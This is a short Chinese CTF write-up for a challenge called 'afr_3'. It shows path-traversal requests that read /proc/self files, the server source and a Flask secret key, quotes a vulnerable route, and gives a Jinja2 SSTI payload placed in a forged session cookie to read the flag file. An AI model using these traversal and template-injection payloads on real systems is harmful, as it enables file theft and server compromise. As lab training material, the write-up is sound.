afr_3
考查内容:对linux系统中/proc/目录下文件作用的了解,同时考查了flask模板注入
请求 http://192.168.60.134/article?name=…/…/…/…/…/proc/self/cmdline获取当前执行系统命令,得到
查看源代码,中间有个空格的
python server.py
请求 http://192.168.60.134/article?name=…/…/…/…/…/proc/self/cwd/server.py获取源码
@app.route("/n1page", methods=["GET", "POST"])
def n1page():
if request.method != "POST":
return redirect(url_for("index"))
n1code = request.form.get("n1code") or None
if n1code is not None:
n1code = n1code.replace(".", "").replace("_", "").replace("{","").replace("}","")
if "n1code" not in session or session['n1code'] is None:
session['n1code'] = n1code
template = None
if session['n1code'] is not None:
'''
这里存在SSTI
'''
template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' % session['n1code']
session['n1code'] = None
return render_template_string(template)
发现flag在flag.py,flask的appkey在key.py,但是此处任意文件读取漏洞被过滤了关键词flag
源码里存在flask SSTI,前提是可以伪造flask的cookie,这里需要用到appkey https://noraj.github.io/flask-session-cookie-manager/
请求 http://192.168.60.134/article?name=…/…/…/…/…/proc/self/cwd/key.py获取appkey
- 伪造cookie为SSTI的payload获取flag.
{{''.__class__.__mro__[2].__subclasses__()[40]('flag.py').read()}}